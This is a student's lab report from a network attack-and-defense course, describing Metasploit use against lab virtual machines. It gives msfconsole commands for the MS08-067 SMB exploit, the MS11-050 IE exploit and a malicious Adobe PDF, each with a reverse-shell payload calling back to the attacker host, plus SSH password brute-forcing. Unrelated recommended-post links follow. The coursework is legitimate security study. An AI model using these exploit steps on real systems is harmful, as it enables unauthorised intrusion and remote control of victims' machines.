20145224陈颢文 《网络攻防》MSF基础应用

基础问题回答

用自己的话解释什么是exploit,payload,encode:

  • exploit:攻击手段,是能使攻击武器(payload)的方法;
  • payload:攻击武器,真正具有攻击性的代码;
  • encode:编码方式,根据payload将要被放置的环境选择合适的编码方式,使它能够正常的运行,如:消除所有的“0x00”;

实验总结与体会

这次实验做的我好心累,也好欣慰,心累是因为想要成功的做出实验实在是太困难了,有个好靶机是关键;欣慰是感觉到我们正在使用的系统也并没有之前想象中的那么不堪,只要及时打补丁,还是能防住不少“小毛贼”的。

实践过程记录

MS08_067漏洞渗透攻击(主动攻击)

  • 使用winXPenSP3为靶机;
  • 首先得确保两台机子在同一网段内,如果不在就手动修改;
  • 终端中打开msfconsole,输入命令use exploit/windows/smb/ms08_067_netapi,使用MS08_067漏洞模块;
  • 使用命令set payload generic/shell_reverse_tcp指定攻击有效载荷;
  • 设置具体参数:set LHOST Kali的IPset RHOST Windows的IP
  • show options查看所有参数是否设置正确,最后下令发起攻击exploit:



MS11050安全漏洞(IE浏览器渗透攻击)

  • 使用免考xp sp3为靶机;
  • 首先得确保两台机子在同一网段内,如果不在就手动修改;
  • 终端中打开msfconsole,输入命令use windows/browser/ms11_050_mshtml_cobjectelement,使用MS11050漏洞模块;
  • 使用命令set payload windows/meterpreter/reverse_tcp指定攻击有效载荷;
  • 设置具体参数:set LHOST Kali的IPset LPORT 自定义端口号set URIPATH 自定义域名
  • show options查看所有参数是否设置正确,最后下令发起攻击exploit:

  • 复制local IP,在靶机上使用IE浏览器进行访问:



    成功是成功了,但是结果和我预想的不太一样?!





    我猜啊,也许是我Kali的版本不一样,所以payload的功能也不同了~

Adobe阅读器渗透攻击(针对客户端)

  • 使用winxpAttaker为靶机;
  • 首先得确保两台机子在同一网段内,如果不在就手动修改;
  • 终端中打开msfconsole,输入命令use exploit/windows/fileformat/adobe_cooltype_sing,使用Adobe阅读器漏洞模块;
  • 使用命令set payload windows/meterpreter/reverse_tcp指定攻击有效载荷;
  • 设置具体参数:set FILENAME 自定义文件名.pdfset LHOST Kali的IPset LPORT 自定义端口号
  • show options查看所有参数是否设置正确,最后输入exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里;



    什么?!粘贴不上去!!!那就快去把靶机里的虚拟机增强工具更新一下吧,别告诉我你不会!
  • 使用back指令返回上一级菜单,再设置msf的监听:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 主机IP
set LPORT 端口号
show options(检查所有数据是否正确)
exploit
  • 最后在靶机中打开刚刚的PDF文件即可(时间略长);

成功应用任何一个辅助模块

  • 显示所有的辅助模块show auxiliary(甚用,谁试谁知道);
  • 通过上面三个实验不难看出msf的使用还是有套路可循的:进入模块->指定荷载->设置参数->发动攻击
  • 这次我尝试使用的是一个扫描SSH弱口令的一个辅助工具ssh_login,模块路径:auxiliary/scanner/ssh/ssh_login;
  • 终端中打开msfconsole,输入命令use auxiliary/scanner/ssh/ssh_login,使用ssh_login模块;
  • 使用show options查看所有参数,其中Required一栏中为“yes”的是必填参数,理论上把他们填好了这个模块也就能正常的使用了:

  • show options查看所有参数是否设置正确,最后输入exploit开始扫描:



    成功登陆到一个用户名为“root”、密码为“123456”的SSH账户!

《网络攻防》 MSF基础应用的更多相关文章

  1. 20145306 张文锦 网络攻防 web基础

    20145306 网络攻防 web基础 实验内容 WebServer:掌握Apache启停配置修改(如监听端口)前端编程:熟悉HTML+JavaScript.了解表单的概念编写不同的HTML网页,放入 ...

  2. 2018-2019-2 20165206 网络攻防技术 Exp5 MSF基础应用

    - 2018-2019-2 20165206<网络攻防技术>Exp5 MSF基础应用 - 实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如 ...

  3. 2018-2019-2 20165336《网络攻防技术》Exp5 MSF基础应用

    2018-2019-2 20165336<网络攻防技术>Exp5 MSF基础应用 一.攻击实例 主动攻击的实践 ms08_067(成功) payload/generic/shell_rev ...

  4. 2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用

    2018-2019-2 20165312<网络攻防技术>Exp5 MSF基础应用 目录 一.知识点总结 二.攻击实例 主动攻击的实践 ms08_067 payload/generic/sh ...

  5. 2018-2019-2 20165315《网络攻防技术》Exp5 MSF基础应用

    2018-2019-2 20165315<网络攻防技术>Exp5 MSF基础应用 目录 一.实验内容 二.实验步骤 1.一个主动攻击实践 ms08_067(成功) 2.一个针对浏览器的攻击 ...

  6. 20145236《网络攻防》Exp5 MSF基础应用

    20145236<网络攻防>Exp5 MSF基础应用 一.基础问题回答 解释exploit,payload,encode是什么: exploit就是负责负载有用代码的交通工具,先通过exp ...

  7. 20155201 网络攻防技术 实验五 MSF基础应用

    20155201 网络攻防技术 实验五 MSF基础应用 一.实践内容 一个主动攻击实践,如ms08_067 一个针对浏览器的攻击,如ms11_050 一个针对客户端的攻击,如Adobe 成功应用任何一 ...

  8. 20155226《网络攻防》 Exp5 MSF基础应用

    20155226<网络攻防> Exp5 MSF基础应用 基础问题回答 1.用自己的话解释什么是exploit,payload,encode? exploit : Exploit的英文意思就 ...

  9. 20155235 《网络攻防》 实验五 MSF基础应用

    20155235 <网络攻防> 实验五 MSF基础应用 实验内容 一个主动攻击实践,如ms08_067; (1分) 一个针对浏览器的攻击,如ms11_050:(1分) 一个针对客户端的攻击 ...

  10. 20155301 《网络攻防》 Exp5 MSF基础应用

    20155301 <网络攻防> Exp5 MSF基础应用 基础问题 1.用自己的话解释什么是exploit,payload,encode 答:exploit就是利用一些工具的,用来收集目标 ...

随机推荐

  1. Django 找不到模版报错" django.template.exceptions.TemplateDoesNotExist: index.html"

    解决办法:在setting.py的TEMPLATES‘DIRS'[]加入模版路径 os.path.join(BASE_DIR, 'templates') TEMPLATES = [ { 'BACKEN ...

  2. Python 构造函数、 Python 析构函数、Python 垃圾回收机制

    构造函数与析构函数 构造函数: 用于初始化类的内容部状态,Python提供的构造函数式 __init__(); 也就是当该类被实例化的时候就会执行该函数.那么我们就可以把要先初始化的属性放到这个函数里 ...

  3. 文件夹进行MD5校验的实现算法

    每份相同数据(文件夹)都可以生成一份唯一的md5校验文件,我们可以通过直接校验整个数据文件夹的方法来确定数据是否有误. 1.针对整个文件夹生成md5校验文件方法: 以data文件夹为例,我们需要得到d ...

  4. iOS-将NSString转换成UTF8编码的NSString

    在使用网络地址时,一般要先将url进行encode成UTF8格式的编码,否则在使用时可能报告网址不存在的错误,这时就需要进行转换 下面就是转换函数: NSString *urlString= [NSS ...

  5. ryu的RESTAPI简介——我主要用于下发和查看流表

    一.Rest API简介 REST即表述性状态传递(RepreSentational State Transfer),是一种针对网络应用的设计和开发方式,可以降低开发的复杂性,提高系统的可伸缩性. 表 ...

  6. git 拉取远程分支到本地并建立关联关系

    git拉取远程分支到本地   一.查看远程分支 使用如下git命令查看所有远程分支: git branch -r   二.拉取远程分支并创建本地分支 方法一 使用如下命令: git checkout ...

  7. 爬虫入门【10】Pyspider框架简介及安装说明

    Pyspider是python中的一个很流行的爬虫框架系统,它具有的特点如下: 1.可以在Python环境下写脚本 2.具有WebUI,脚本编辑器,并且有项目管理和任务监视器以及结果查看. 3.支持多 ...

  8. 全局安装了express框架,但是无法使用express指令的问题

    错误截图: 产生这个错误的原因是:我安装的是express4版本,需要安装express-generator才能使用express命令 将express-generator安装后就都解决了:

  9. 传说中的MATLAB1.0(1984年DOS界面182K、运行良好)附下载

    传说中的MATLAB1.0(1984年DOS界面182K.运行良好)附下载 你见过 MATLAB 最早的版本吗?下载一份 MATLAB 1.0,(只有182K, 只有20来个函数) 体会一下吧.MAT ...

  10. Linux使用SecureCRT上传下载

    操作远程 Linux 系统,很多时候选用 SecureCRT 软件,在 SecureCRT 环境下,使用 lrzsz 工具可以很方便的完成文件的上传下载. 这里使用的 Ubuntu Linux 安装: ...